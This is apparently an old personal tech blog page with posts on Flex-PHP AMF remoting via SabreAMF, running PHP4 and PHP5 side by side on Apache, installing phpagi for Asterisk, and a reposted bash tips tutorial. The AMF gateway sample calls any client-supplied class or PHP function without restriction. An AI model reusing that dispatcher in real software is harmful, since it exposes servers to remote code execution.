}

From a PHP point of view nothing special here, just basic classes with a simple constructor and a few public properties to play with later on. However, notice the members collection (created in the CGroup constructor), which is derived from SabreAMF_ArrayCollection (see class CCollection) included with SabreAMF. There are a few classes in Flex which do not really map well to PHP and vice versa. Notably the ArrayCollection is a well known class in Flex and is used frequently, but they already did that mapping for you!

interfacing class
To keep things simple and structured, i.e. a single point of entry for AMF communication, a separate interface class is created like this:

CObjects.php

class CAMF {

    .
    .

    public function SendUser(CUser $user) {
        $user->username .= " is back!";
        return $user;
    }

    .
    .

    public function SendMembers(CGroup $group) {
        $c=$group->members->count();
        $group->name .= " members: $c";
        return $group;
    }

}

Every single function in here can be called one-on-one from Flex! Cool hè :) I wrote a small class which handles requests from Flex: CAmf. During coding and debugging, small itches occurred while tracing and refreshing.. probably a cache thingy. Normally a RemoteObject is configured via an XML file describing various settings, among them the gateway URL, e.g. http://servert/gateway.php. It would keep connecting to the old one after changing it to, for example, http://servert2/gateway2.php .. grrrrr

The CAmf class builds a RemoteObject at runtime and takes care of the default event handling, otherwise a tedious job ;) Furthermore it simplifies calls to our PHP gateway with the call function, which I´ll describe later:

classes/CAmf.as

public function call(serviceName: String = "", methodName: String = "", arguments = null): void {
    this.amf.source = serviceName;
    var at: AsyncToken = this.amf.getOperation( methodName ).send( arguments );
}

flex classes
I haven´t found a mechanism yet to put all Flex classes in a single file. I´m not sure if it´s possible, ´cause I remember reading somewhere that you can only publish a single class per file..

classes/CUser.as

package classes
{

    [RemoteClass(alias="classes.CUser")]
    [Bindable]
    public class CUser extends CObject
    {
        public var id:int;
        public var username:String;

        //constructor
        public function CUser()
        {
            id          = 0;
            username    = "[username]";
        }

    }

}

classes/CGroup.as

package classes
{
    import classes.CCollection;

    [RemoteClass(alias="classes.CGroup")]
    [Bindable]
    public class CGroup extends CObject
    {
        public var id:int;
        public var name:String;
        public var members: CCollection;

        //constructor
        public function CGroup()
        {
            id      = 0;
            name   	= "[name]";
            members	= new CCollection();
        }
    }

}

classes/CCollection.as

package classes
{
    import mx.collections.ArrayCollection;

    [RemoteClass(alias="classes.CCollection")]
    [Bindable]
    public class CCollection extends ArrayCollection
    {
        public function CCollection(source:Array = null)
        {
            super(source);
        }
    }

}

Again nothing special, except for a little experiment with CCollection: it is derived from ArrayCollection just to see if ‘type’ changes affect AMF communication.

amf gateway
You can pretty much use the example service callbackserver.php which comes with sabreamf. We´re going to build a callback service, register our php and flex classes and expand the onInvokeService a little bit:

gateway.php

SabreAMF_ClassMapper::registerClass('classes.CCollection'   ,'CCollection');
SabreAMF_ClassMapper::registerClass('classes.CUser'         ,'CUser');
SabreAMF_ClassMapper::registerClass('classes.CGroup'        ,'CGroup');

$server = new SabreAMF_CallbackServer();
$server->onInvokeService = 'InvokeService';
$server->exec();

function InvokeService($serviceName, $methodName, $arguments) {
    if (class_exists($serviceName)) {
        $serviceObject = new $serviceName;
        if (method_exists($serviceObject, $methodName)) {
            return call_user_func_array(array($serviceObject,$methodName),$arguments);
        } else {
            throw new Exception("Method '{$methodName}' does not exist in class '{$serviceName}'", 1);
        }
    } elseif (function_exists($methodName)) {
        return call_user_func($methodName, $arguments);
    } else {
        throw new Exception("Nothing to do for\r {$serviceName}->{$methodName}(".implode('|',$arguments).")", 2);
    }

}

This is where the magic takes place! The registerClass calls at the top of gateway.php take two arguments (both from a PHP point of view):

    1. $remoteClass:
    To import/include a Flex class you need to supply the full name including the directory name relative to the project sources: our Flex classes are stored in the directory classes/*.as
    The line [RemoteClass(alias="classes.CUser")] tells Flex to send this class to PHP identified as "classes.CUser". Consequently it will be mapped to CUser.

    2. $localClass:
    The name of the php class you want it to be mapped to.

For the coding stylists among us: hè what can I say!? I´m a bit neurotic when if-statements come into play..where´s the else??? I need to know it all. And yes I like exceptions too ;)

Sending and receiving objects using class mappings
Let´s say we want to create a new user in Flex and give it to PHP:

var amf: CAmf = new CAmf( "http://192.168.1.1/gateway.php" );

var userA: CUser = new CUser();
    userA.username = "Pepe";

amf.call( "CAMF", "SendUser", userA );

After creating a connection to the gateway, we create a user and send it to our interfacing class CAMF using the function SendUser with userA as parameter. If all went well, an alert should pop up with the username changed.

Let´s say we want to create a group, add some users in Flex and give it to PHP:

var amf: CAmf = new CAmf( "http://192.168.1.1/gateway.php" );

var group: CGroup = new CGroup();
    group.name = "P´s";

var userA: CUser = new CUser();
    userA.username = "Peter";
    group.members.addItem( userA );

var userB: CUser = new CUser();
    userB.username = "Patrick";
    group.members.addItem( userB );

amf.call( "CAMF", "SendMembers", group );

After adding the users, the group is sent using CAMF->SendMembers( group ). If all went well again, it should return telling you how many members were found. The group is already deserialized before reaching the function, hence a type hint like (CGroup $group) is possible!

Download source files

references
Using Flex 2 RemoteObject and SabreAMF by Renaun Erickson
Getting started with SabreAMF by Wil Li
SabreAMF
AMFPHP
BlazeDS
PyAMF

July 9th, 2008 - Posted in flex, php | | 0 Comments

Multiple/unlimited php versions on a single Debian apache server

For a project I needed a PHP4 installation; unfortunately (depending on your view) my server was running PHP5. So I needed a dual PHP setup ’cause I didn’t want to upset other users on the same machine. Searching the web I came across a few different approaches; some worked, others didn´t. Here´s a list of what I found:

  • http://www.howtoforge.com/apache2_with_php5_and_php4
  • http://gggeek.altervista.org/2007/07/21/running-multiple-php-versions-on-a-single-apache-install/
  • http://www.hilluzination.de/php-fastcgi/php-fastcgi.html

It basically boils down to having one version loaded as a module (the default version) and the other(s) as CGI. Execute apt-get install php4-cgi and a2enmod actions

With some reservation I mentioned others in plural, because, as far as I´ve seen, there really is no limit in different versions installed through CGI. Just rename all php-cgix executables in an orderly fashion and you should be fine. Let me know if you had the courage to try!

I chose the most elegant one (and made a few adjustments ;)

  • http://www.jsanroman.net/2008/05/06/php5-y-php4-tambien-conviven-en-mi-ubuntu/

This cabròn configured a virtual host like this:

<VirtualHost *:80>
	ServerAdmin pepe@midominio.com
	ServerName midominio.com
	DocumentRoot /home/pepe/php4/miproyecto
	ErrorLog /var/log/apache2/error.log
	LogLevel warn
	CustomLog /var/log/apache2/access.log combined

	ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/

	<Directory />
		AddHandler php-script .php
		Action php-script /cgi-bin/php4
		Options FollowSymLinks
		AllowOverride None
	</Directory>
</VirtualHost>

This excerpt finally made it into mine:

<VirtualHost *:80>
	ServerAdmin pepe@midominio.com
	ServerName midominio.com
	DocumentRoot /home/pepe/www

	ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
	AddHandler php-script .php4
	Action php-script /cgi-bin/php4
</VirtualHost>

Test the dual PHP configuration by creating two identical phpinfo() files with different extensions, like phpinfo.php4 and phpinfo.php. The latter should still be parsed as PHP 5.

July 3rd, 2008 - Posted in php | | 0 Comments

Installing phpagi 2.x

I’m using Debian/4, Apache/2.2.3, PHP 5.2.5-0.dotdeb.2 and Asterisk/1.4.13

Download the phpagi 2.x files from http://phpagi.sourceforge.net/

Adjust agi script files location set in asterisk.conf (a simple reload won’t do the job, so restart Asterisk afterwards)

[directories]
astagidir => /var/lib/asterisk/agi-bin

Create a context in the dialplan for your agi scripts in extensions.conf
[agi]
exten => 800,1,Verbose(1|AGI)
exten => 800,n,agi(dtmf.php)
exten => 800,n,Hangup()

and include it in your incoming context with
include => agi

Before you can use the examples eg. dtmf.php a few adjustments are needed:

1. Scripts must be executable: chmod 755 dtmf.php

2. All php files are run by Asterisk, as if started from the console, so test that by actually running it from the console.

I had to edit dtmf.php to make a few changes:
Change the interpreter location from
#!/usr/local/bin/php -q
to
#!/usr/bin/php5 -q

Change the php include path to let the script find the file phpagi.php with
ini_set( "include_path", "/your_folder_to_phpagi.php/" );

Install speech engine
I followed the installation guide available at www.voip-info.org.

apt-get install festival
Comment out ;exit 0

Possible errors and solutions

Error message:
Failed to execute ‘/var/lib/asterisk/agi-bin/dtmf.php’: No such file or directory

Solutions:
Either check your astagidir in asterisk.conf
or make the dtmf.php executable with chmod 755
or check the line “#!/usr/bin/php5 -q”

Error message:
WARNING[26320]: file.c:563 ast_openstream_full: File /var/spool/asterisk/tmp//text2wav_ace75969fc9b3a79aef4da4291ca0646 does not exist in any format.
Solution:
Festival is not started or installed (Remember the exit 0; ?)

ADDENDUM:

http://jroliva.wordpress.com/2008/10/26/howto-consulta-de-stocks-usando-asterisk-phpagi-y-mysql/

Update 07/12/2011:

The Festival installation guide at www.voip-info.org has been moved to http://www.voip-info.org/wiki/view/Asterisk+festival+installation

June 26th, 2008 - Posted in asterisk, voIP | | 2 Comments

Installing Spanish voices for festival speech synthesis system

On this blog I found the packages to install Spanish voices for Festival. No apt-getting but *.deb files, learn how to install these…

June 26th, 2008 - Posted in asterisk, voIP | | 0 Comments

Tutorial: The best tips & tricks for bash…

Original text from Rechosen can be found here.

The bash shell is just amazing. There are so many tasks that can be simplified using its handy features. This tutorial covers some of those features, explains what exactly they do and teaches you how to use them.

Difficulty: Basic - Medium

Running a command from your history

Sometimes you know that you ran a command a while ago and you want to run it again. You know a bit of the command, but you don’t exactly know all options, or when you executed the command. Of course, you could just keep pressing the Up Arrow until you encounter the command again, but there is a better way. You can search the bash history in an interactive mode by pressing Ctrl + r. This will put bash in history mode, allowing you to type a part of the command you’re looking for. Meanwhile, it will show the most recent occasion where the string you’re typing was used. If the command it shows is too recent, you can go further back in history by pressing Ctrl + r again and again. Once you have found the command you were looking for, press enter to run it. If you can’t find what you’re looking for and you want to try again, or if you want to get out of history mode for another reason, just press Ctrl + c. By the way, Ctrl + c can be used in many other cases to cancel the current operation and/or start with a fresh new line.

Repeating an argument

You can repeat the last argument of the previous command in multiple ways. Have a look at this example:

[rechosen@localhost ~]$ mkdir /path/to/exampledir
[rechosen@localhost ~]$ cd !$

The second command might look a little strange, but it will just cd to /path/to/exampledir. The “!$” syntax repeats the last argument of the previous command. You can also insert the last argument of the previous command on the fly, which enables you to edit it before executing the command. The keyboard shortcut for this functionality is Esc + . (a period). You can also repeatedly press these keys to get the last argument of commands before the previous one.
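A side note for scripts: history expansion such as “!$” is normally only active in interactive shells, so it won’t help you there. A rough equivalent is the special parameter $_, which bash sets to the last argument of the previously executed command. Below is a minimal sketch of that idea; the scratch directory from mktemp and the names workdir and landed_in are just assumptions for the example.

```bash
#!/bin/bash
# Create a scratch directory so the example does not touch real paths.
workdir=$(mktemp -d)

# $_ expands to the last argument of the previously executed command,
# here the path that was just handed to mkdir.
mkdir -p "$workdir/exampledir"
cd "$_" || exit 1

# Remember where we ended up so it can be inspected afterwards.
landed_in=$PWD
echo "now in: $landed_in"
```

Unlike Esc + ., this cannot be edited before it runs, so it is best kept directly after the command it refers to.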

Some keyboard shortcuts for editing

There are some pretty useful keyboard shortcuts for editing in bash. They might appear familiar to Emacs users:

  • Ctrl + a => Return to the start of the command you’re typing
  • Ctrl + e => Go to the end of the command you’re typing
  • Ctrl + u => Cut everything before the cursor to a special clipboard
  • Ctrl + k => Cut everything after the cursor to a special clipboard
  • Ctrl + y => Paste from the special clipboard that Ctrl + u and Ctrl + k save their data to
  • Ctrl + t => Swap the two characters before the cursor (you can actually use this to transport a character from the left to the right, try it!)
  • Ctrl + w => Delete the word / argument left of the cursor
  • Ctrl + l => Clear the screen

Dealing with jobs

If you’ve just started a huge process (like backing up a lot of files) using an ssh terminal and you suddenly remember that you need to do something else on the same server, you might want to get the huge process to the background. You can do this by pressing Ctrl + z, which will suspend the process, and then executing the bg command:

[rechosen@localhost ~]$ bg
[1]+ hugeprocess &

This will make the huge process continue happily in the background, allowing you to do what you need to do. If you want to background another process with the huge one still running, just use the same steps. And if you want to get a process back to the foreground again, execute fg:

[rechosen@localhost ~]$ fg
hugeprocess

But what if you want to foreground an older process that’s still running? In a case like that, use the jobs command to see which processes bash is managing:

[rechosen@localhost ~]$ jobs
[1]- Running hugeprocess &
[2]+ Running anotherprocess &

Note: A “+” after the job id means that that job is the ‘current job’, the one that will be affected if bg or fg is executed without any arguments. A “-” after the job id means that that job is the ‘previous job’. You can refer to the previous job with “%-”.

Use the job id (the number on the left), preceded by a “%”, to specify which process to foreground / background, like this:

[rechosen@localhost ~]$ fg %3

And:

[rechosen@localhost ~]$ bg %7

The above snippets would foreground job [3] and background job [7].
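Note that bg, fg and Ctrl + z rely on job control, which bash only enables by default in interactive shells. In a script, the closest equivalent is to start commands with “&” and collect them later with wait. The following is a small sketch of that pattern, not part of the original tutorial; the subshells with sleep merely stand in for long-running commands, and the variable names are made up for the example.

```bash
#!/bin/bash
# Two background jobs; the subshells stand in for long-running commands
# and finish with different exit codes so they can be told apart.
( sleep 0.2; exit 0 ) &
first_pid=$!      # $! is the process id of the most recent background job
( sleep 0.1; exit 3 ) &
second_pid=$!

# The script carries on here while both jobs run in the background.
echo "started jobs $first_pid and $second_pid"

# wait blocks until the given job has finished and returns its exit status.
first_status=0
wait "$first_pid" || first_status=$?
second_status=0
wait "$second_pid" || second_status=$?

echo "first: $first_status, second: $second_status"
```

Waiting on a specific process id, rather than a bare wait, lets the script tell which job failed.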

Using several ways of substitution

There are multiple ways to embed a command in another one. You could use the following way (which is called command substitution):

[rechosen@localhost ~]$ du -h -a -c $(find . -name '*.conf' 2>&-)

The above command is quite a mouthful of options and syntax, so I’ll explain it.

  • The du command calculates the actual size of files. The -h option makes du print the sizes in human-readable format, the -a tells du to calculate the size of all files, and the -c option tells du to produce a grand total. So, “du -h -a -c” will show the sizes of all files passed to it in a human-readable form and it will produce a grand total.
  • As you might have guessed, “$(find . -name '*.conf' 2>&-)” takes care of giving du some files to calculate the sizes of. This part is wrapped between “$(” and “)” to tell bash that it should run the command and return the command’s output (in this case as arguments for du). The find command searches for files named <can be anything>.conf in the current directory and all accessible subdirectories. The “.” indicates the current directory, the -name option allows you to specify the filename of the file to search for, and “*.conf” is an expression that matches any string ending with the character sequence “.conf”. The single quotes around it stop bash from expanding the pattern itself before find gets to see it.
  • The only thing left to explain is the “2>&-”. This part of the syntax closes the stderr stream of find, so its error messages (for example about unreadable directories) are discarded instead of cluttering the terminal. Command substitution only captures stdout, so du won’t get any non-filename input either way. There is a huge amount of explanation about this syntax near the end of the tutorial (look for “2>&1” and further).
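To try command substitution without touching real configuration files, here is a small self-contained sketch. The scratch directory and file names are invented for the example, and it redirects errors to /dev/null rather than closing the stream, which is a common alternative.

```bash
#!/bin/bash
# Build a scratch tree with two .conf files and one unrelated file.
workdir=$(mktemp -d)
mkdir -p "$workdir/sub"
printf 'a\n' > "$workdir/one.conf"
printf 'b\n' > "$workdir/sub/two.conf"
printf 'c\n' > "$workdir/notes.txt"

# $( ... ) runs the pipeline and hands its stdout back as a string.
# Quoting '*.conf' makes sure find, not the shell, expands the pattern.
conf_count=$(find "$workdir" -name '*.conf' 2>/dev/null | wc -l)
conf_count=$((conf_count))   # drop the padding some wc versions add

echo "found $conf_count .conf files"
```

Because the result of $( ... ) is split on whitespace when left unquoted, file names containing spaces need a different approach, such as the xargs -0 pipeline further on.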

And there’s another way to substitute, called process substitution:

[rechosen@localhost ~]$ diff <(ps axo comm) <(ssh user@host ps axo comm)

The command in the snippet above will compare the running processes on the local system and a remote system with an ssh server. Let’s have a closer look at it:

  • First of all, diff. The diff command can be used to compare two files. I won’t tell much about it here, as there is an extensive tutorial about diff and patch on this site.
  • Next, the “<(” and “)”. These strings indicate that bash should substitute the command between them as a process. This will create a named pipe (usually in /dev/fd) that, in our case, will be given to diff as a file to compare.
  • Now the “ps axo comm”. The ps command is used to list processes currently running on the system. The “a” option tells ps to list all processes with a tty, the “x” tells ps to list processes without a tty, too, and “o comm” tells ps to list the commands only (“o” indicates the starting of a user-defined output declaration, and “comm” indicates that ps should print the COMMAND column).
  • The “ssh user@host ps axo comm” will run “ps axo comm” on a remote system with an ssh server. For more detailed information about ssh, see this site’s tutorial about ssh and scp.

Let’s have a look at the whole snippet now:

  • After interpreting the line, bash will run “ps axo comm” and redirect the output to a named pipe,
  • then it will execute “ssh user@host ps axo comm” and redirect the output to another named pipe,
  • and then it will execute diff with the filenames of the named pipes as argument.
  • The diff command will read the output from the pipes and compare them, and return the differences to the terminal so you can quickly see what differences there are in running processes (if you’re familiar with diff’s output, that is).

This way, you have done in one line what would normally require at least two: comparing the outputs of two processes.
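If you don’t have a second machine at hand, the same technique can be tried locally. In this sketch the two printf commands are stand-ins for the local and remote “ps axo comm” (an assumption made only so the result is predictable), and differences is just a name picked for the example.

```bash
#!/bin/bash
# Each <( ... ) is replaced by a file name that diff can read from;
# printf plays the role of the two process listings here.
# diff exits with status 1 when its inputs differ, hence the "|| true".
differences=$(diff <(printf 'bash\ncron\nsshd\n') \
                   <(printf 'bash\nnginx\nsshd\n')) || true

# Lines starting with "<" only exist on the left side, ">" on the right.
echo "$differences"
```

Process substitution is a bash feature, so the script has to be run with bash rather than a plain POSIX sh.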

And there even is another way, called xargs. This command can feed arguments, usually imported through a pipe, to a command. See the next chapter for more information about pipes. We’ll now focus on xargs itself. Have a look at this example:

[rechosen@localhost ~]$ find . -name '*.conf' -print0 | xargs -0 grep -l -Z mem_limit | xargs -0 -i cp {} {}.bak

Note: the “-l” after grep is an L, not an i.

The command in the snippet above will make a backup of all .conf files in the current directory and accessible subdirectories that contain the string “mem_limit”.

  • The find command is used to find all files in the current directory (the “.”) and accessible subdirectories with a filename (the “-name” option) that ends with “.conf” (“*.conf” means “<anything>.conf”). It returns a list of them, with null characters as separators (“-print0” tells find to do so).
  • The output of find is piped (the “|” operator, see the next chapter for more information) to xargs. The “-0” option tells xargs that the names are separated by null characters, and “grep -l -Z mem_limit” is the command that the list of files will be fed to as arguments. The grep command will search the files it gets from xargs for the string “mem_limit”, returning a list of files (the -l option tells grep not to return the contents of the files, but just the filenames), again separated by null characters (the “-Z” option causes grep to do this).
  • The output of grep is also piped, to “xargs -0 -i cp {} {}.bak”. We know what xargs does, except for the “-i” option. The “-i” option tells xargs to replace every occurrence of the specified string with the argument it gets through the pipe. If no string is specified (as in our case), xargs will assume that it should replace the string “{}”. Next, the “cp {} {}.bak”. The “{}” will be replaced by xargs with the argument, so, if xargs got the file “sample.conf” through the pipe, cp will copy the file “sample.conf” to the file “sample.conf.bak”, effectively making a backup of it.
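The pipeline can be tried safely on a scratch directory, as in the sketch below. The file names are made up, one of them deliberately contains a space to show why the null separators matter, and two spellings are swapped in as assumptions about portability: “--null” is the long form of GNU grep’s “-Z”, and “-I{}” is the non-deprecated spelling of “-i”.

```bash
#!/bin/bash
# Scratch directory with one matching and one non-matching .conf file.
workdir=$(mktemp -d)
printf 'mem_limit = 64M\n' > "$workdir/with limit.conf"
printf 'other = 1\n'       > "$workdir/plain.conf"

# find emits null-separated names, grep keeps only files containing
# mem_limit (again null-separated), and cp makes a .bak copy of each.
find "$workdir" -name '*.conf' -print0 \
  | xargs -0 grep -l --null mem_limit \
  | xargs -0 -I{} cp {} {}.bak

ls "$workdir"
```

Only “with limit.conf” gets a backup, and the space in its name survives because nothing in the chain splits on whitespace.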

These substitutions can, once mastered, provide short and quick solutions for complicated problems.

Piping data through commands

One of the most powerful features is the ability to pipe data through commands. You could see this as letting bash take the output of a command, then feed it to another command, take the output of that, feed it to another and so on. This is a simple example of using a pipe:

[rechosen@localhost ~]$ ps aux | grep init

If you don’t know the commands yet: “ps aux” lists all processes that are currently running on your system (the “a” means that processes of other users than the current user should also be listed, the “u” selects the user-oriented output format, which adds columns such as the owning user, and the “x” means that background processes (without a tty) should also be listed). The “grep init” searches the output of “ps aux” for the string “init”. It does so because bash pipes the output of “ps aux” to “grep init”, and bash does that because of the “|” operator.

The “|” operator makes bash redirect all data that the command left of it returns to the stdout (more about that later) to the stdin of the command right of it. There are a lot of commands that support taking data from the stdin, and almost every program supports returning data using the stdout.

The stdin and stdout are part of the standard streams; they were introduced with UNIX and are channels over which data can be transported. There are three standard streams (the third one is stderr, which should be used to report errors). The stdin channel can be used by other programs to feed data to a running process, and the stdout channel can be used by a program to export data. Usually, stdout output (and stderr output, too) is received by the terminal environment in which the program is running, in our case bash. By default, bash will show you the output by echoing it onto the terminal screen, but now that we pipe it to another command, we are not shown the data.

Please note that, as in a pipe only the stdout of the command on the left is passed on to the next one, the stderr output will still go to the terminal. I will explain how to alter this further on in this tutorial.

If you want to see the data that’s passed on between programs in a pipe, you can insert the “tee” command between it. This program receives data from the stdin and then writes it to a file, while also passing it on again through the stdout. This way, if something is going wrong in a pipe sequence, you can see what data was passing through the pipes. The “tee” command is used like this:

[rechosen@localhost ~]$ ps aux | tee filename | grep init

The “grep” command will still receive the output of “ps aux”, as tee just passes the data on, but you will be able to read the output of “ps aux” in the file <filename> after the commands have been executed. Note that “tee” tries to replace the file <filename> if you specify the command like this. If you don’t want “tee” to replace the file but to append the data to it instead, use the -a option, like this:

[rechosen@localhost ~]$ ps aux | tee -a filename | grep init
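Here is a small sketch of both forms of tee that you can run without side effects. The printf commands stand in for “ps aux” so the data is predictable, and the scratch file all.txt is an assumption for the example.

```bash
#!/bin/bash
workdir=$(mktemp -d)

# tee writes everything it reads to all.txt and passes it on to grep,
# so grep still sees all three lines but only keeps the matching one.
matches=$(printf 'init\nbash\nsshd\n' | tee "$workdir/all.txt" | grep init)

# With -a, tee appends to the file instead of replacing it.
printf 'cron\n' | tee -a "$workdir/all.txt" > /dev/null

line_count=$(wc -l < "$workdir/all.txt")
line_count=$((line_count))   # drop the padding some wc versions add
echo "grep kept: $matches, file now holds $line_count lines"
```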

As you have been able to see in the above command, you can place a lot of commands with pipes after each other. This is not infinite, though. There is a maximum command-line length, which is usually determined by the kernel. However, this value usually is so big that you are very unlikely to hit the limit. If you do, you can always save the stdout output to a file somewhere in between and then use that file to continue operation. And that introduces the next subject: saving the stdout output to a file.

Saving the stdout output to a file

You can save the stdout output of a command to a file like this:

[rechosen@localhost ~]$ ps aux > filename

The above syntax will make bash write the stdout output of “ps aux” to the file filename. If filename already exists, bash will try to overwrite it. If you don’t want bash to do so, but to append the output of “ps aux” to filename, you could do that this way:

[rechosen@localhost ~]$ ps aux >> filename

You can use this feature of bash to split a long line of pipes into multiple lines:

[rechosen@localhost ~]$ command1 | command2 | … | commandN > tempfile1

[rechosen@localhost ~]$ cat tempfile1 | command1 | command2 | … | commandN > tempfile2

And so on. Note that the above use of cat is, in most cases, a useless one. In many cases, you can let command1 in the second snippet read the file, like this:

[rechosen@localhost ~]$ command1 tempfile1 | command2 | … | commandN > tempfile2

And in other cases, you can use a redirect to feed a file to command1:

[rechosen@localhost ~]$ command1 < tempfile1 | command2 | … | commandN > tempfile2

To be honest, I mainly included this to avoid getting the Useless Use of Cat Award =).

Anyway, you can also use bash’s ability to write streams to file for logging the output of script commands, for example. By the way, did you know that bash can also write the stderr output to a file, or both the stdout and the stderr streams?

Playing with standard streams: redirecting and combining

The bash shell allows us to redirect streams to other streams or to files. This is quite a complicated feature, so I’ll try to explain it as clearly as possible. Redirecting a stream is done like this:

[rechosen@localhost ~]$ ps aux 2>&1 | grep init

In the snippet above, “grep init” will not only search the stdout output of “ps aux”, but also the stderr output. The stderr and the stdout streams are combined. This is caused by that strange “2>&1” after “ps aux”. Let’s have a closer look at that.

First, the “2”. As said, there are three standard streams (stdin, stdout and stderr). These standard streams also have default numbers:

  • 0: stdin
  • 1: stdout
  • 2: stderr

As you can see, “2” is the stream number of stderr. And “>”, we already know that from making bash write to a file. The actual meaning of this symbol is “redirect the stream on the left to the stream on the right”. If there is no stream on the left, bash will assume you’re trying to redirect stdout. If there’s a filename on the right, bash will redirect the stream on the left to that file, so that everything passing through the pipe is written to the file.

Note: the “>” symbol is used with and without a space behind it in this tutorial. This is only to keep it clear whether we’re redirecting to a file or to a stream: in reality, when dealing with streams, it doesn’t matter whether a space is behind it or not. When substituting processes, you shouldn’t use any spaces.

Back to our “2>&1”. As explained, “2” is the stream number of stderr, “>” redirects the stream somewhere, but what is “&1”? You might have guessed, as the “grep init” command mentioned above searches both the stdout and stderr stream, that “&1” is the stdout stream. The “&” in front of it tells bash that you don’t mean a file with filename “1”. The streams are sent to the same destination, and to the command receiving them it will seem like they are combined.

If you’d want to write to a file with the name “&1″, you’d have to escape the “&”, like this:

[rechosen@localhost ~]$ ps aux > \&1

Or you could put “&1″ between single quotes, like this:

[rechosen@localhost ~]$ ps aux > '&1'

Wrapping a filename containing problematic characters between single quotes generally is a good way to stop bash from messing with it. The one exception is a single quote inside the string: a \ has no special meaning between single quotes, so you’d have to close the quoted part, add an escaped quote (\') and then open a new quoted part.

Back again to the “2>&1”. Now that we know what it means, we can also apply it in other ways, like this:

[rechosen@localhost ~]$ ps aux > filename 2>&1

The stdout output of ps aux will be sent to the file filename, and the stderr output, too. Now, this might seem illogical. If bash interprets it from the left to the right (and it does), you might think that it should be like:

[rechosen@localhost ~]$ ps aux 2>&1 > filename

Well, it shouldn’t. If you’d execute the above syntax, the stderr output would just be echoed to the terminal. Why? Because bash does not redirect to a stream, but to the current final destination of the stream. Let me explain it:

  • First, we’re telling bash to run the command “ps” with “aux” as an argument.
  • Then, we’re telling bash to redirect stderr to stdout. At the moment, stdout is still going to the terminal, so the stderr output of “ps aux” is sent to the terminal.
  • After that, we’re telling bash to redirect the stdout output to the file filename. The stdout output of “ps aux” is sent to this file indeed, but the stderr output isn’t: it is not affected by stream 1.

If we put the redirections the other way around (”> filename” first), it does work. I’ll explain that, too:

  • First, we’re telling bash to run the command “ps” with “aux” as an argument (again).
  • Then, we’re redirecting the stdout to the file filename. This causes the stdout output of “ps aux” to be written to that file.
  • After that, we’re redirecting the stderr stream to the stdout stream. The stdout stream is still pointing to the file filename because of the former statement. Therefore, stderr output is also written to the file.

Get it? The redirects cause a stream to go to the same final destination as the specified one. It does not actually merge the streams, however.
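The difference between the two orders is easy to check for yourself. The sketch below uses a small helper function, noisy, which I made up for the example because “ps aux” rarely writes anything to stderr; the log file names are assumptions as well. In the second call, command substitution plays the role of the terminal, catching whatever still goes to the original stdout.

```bash
#!/bin/bash
workdir=$(mktemp -d)

# Hypothetical helper: writes one line to stdout and one to stderr.
noisy() { echo "to stdout"; echo "to stderr" >&2; }

# stdout goes to the file first, then stderr follows it there.
noisy > "$workdir/both.log" 2>&1
both_lines=$(wc -l < "$workdir/both.log")
both_lines=$((both_lines))

# Other way around: stderr is pointed at the current destination of
# stdout (captured here by $( ... )), and only then stdout moves to the file.
leaked=$(noisy 2>&1 > "$workdir/only_out.log")
only_out=$(cat "$workdir/only_out.log")

echo "both.log has $both_lines lines; leaked: $leaked; file: $only_out"
```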

Now that we know how to redirect, we can use it in many ways. For example, we could pipe the stderr output instead of the stdout output:

[rechosen@localhost ~]$ ps aux 2>&1 > /dev/null | grep init

The syntax in this snippet will send the stderr output of “ps aux” to “grep init”, while the stdout output is sent to /dev/null and therefore discarded. Note that “grep init” will probably not find anything in this case as “ps aux” is unlikely to report any errors.

When looking more closely at the snippet above, a problem arises. As bash reads the command statements from the left to the right, nothing should go through the pipe, you might say. At the moment that “2>&1” is specified, stdout should still point to the terminal, shouldn’t it? Well, here’s a thing you should remember: bash reads command statements from the left to the right, but, before that, determines if there are multiple command statements and in which way they are separated. Therefore, bash already read and applied the “|” pipe symbol and stdout is already pointing to the pipe. Note that this also means that stream redirections must be specified before the pipe operator. If you, for example, would move “2>&1” to the end of the command, after “grep init”, it would not affect ps aux anymore.

We can also swap the stdout and the stderr stream. This allows to let the stderr stream pass through a pipe while the stdout is printed to the terminal. This will require a 3rd stream. Let’s have a look at this example:

[rechosen@localhost ~]$ ps aux 3>&1 1>&2 2>&3 | grep init

That stuff seems to be quite complicated, right? Let’s analyze what we’re doing here:

  • “3>&1” => We’re redirecting stream 3 to the same final destination as stream 1 (stdout). Stream 3 is a non-standard stream, but it is pretty much always available in bash. This way, we’re effectively making a backup of the destination of stdout, which is, in this case, the pipe.
  • “1>&2” => We’re redirecting stream 1 (stdout) to the same final destination as stream 2 (stderr). This destination is the terminal.
  • “2>&3” => We’re redirecting stream 2 (stderr) to the final destination of stream 3. In the first of these three steps, we set stream 3 to the same final destination as stream 1 (stdout), which was the pipe at that moment. After that, we redirected stream 1 (stdout) to the final destination of stream 2 at that moment, the terminal. If we hadn’t made a backup of stream 1’s final destination in the beginning, we would not be able to refer to it now.
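
The three steps can be tried out with a sketch like the following. The function emit is a hypothetical stand-in for “ps aux”, cat stands in for “grep init”, and a temporary file takes the place of the terminal so that both destinations can be inspected afterwards.

```shell
# emit is a hypothetical stand-in for a command that writes one line
# to stdout and one line to stderr.
emit() {
  echo "to stdout"
  echo "to stderr" >&2
}

errfile=$(mktemp)

# Inside the braces, stderr points to errfile (instead of the terminal).
# 3>&1 backs up the pipe, 1>&2 sends stdout to errfile, and 2>&3 sends
# stderr into the pipe.
through_pipe=$( { emit 3>&1 1>&2 2>&3 | cat; } 2> "$errfile" )
on_stderr=$(cat "$errfile")

rm -f "$errfile"
```

After the swap, the line written to stderr is the one that travels through the pipe, while the stdout line ends up where stderr used to point.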

So, by using a backup stream, we can swap the stdout and stderr stream. This backup stream does not belong to the standard streams, but it is pretty much always available in bash. If you’re using it in a script, make sure you aren’t breaking an earlier command by playing with the 3rd stream. You can also use stream 4, 5, 6, 7 and so on if you need more streams. The highest stream number usually is 1023 (there are 1024 streams, but the first stream is stream 0, stdin). This number follows from the limit on open files per process, which “ulimit -n” reports, so it may be different on other Linux systems. Your mileage may vary. If you try to use a non-existing stream, you will get an error like this:

bash: 1: Bad file descriptor
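
A minimal sketch to provoke this error on purpose. Descriptor 9 is an arbitrary choice, and it is closed first inside a subshell so the example does not depend on what the calling environment left open. The exact wording of the message depends on the shell and the locale, so the sketch only looks at the exit status.

```shell
# Per-process limit on open file descriptors; the highest usable stream
# number is normally one less than this value.
limit=$(ulimit -n)

# Close descriptor 9 inside a subshell, then try to write to it.
# The error message is captured instead of being printed.
msg=$( ( exec 9>&-; echo "hello" >&9 ) 2>&1 )
status=$?
```

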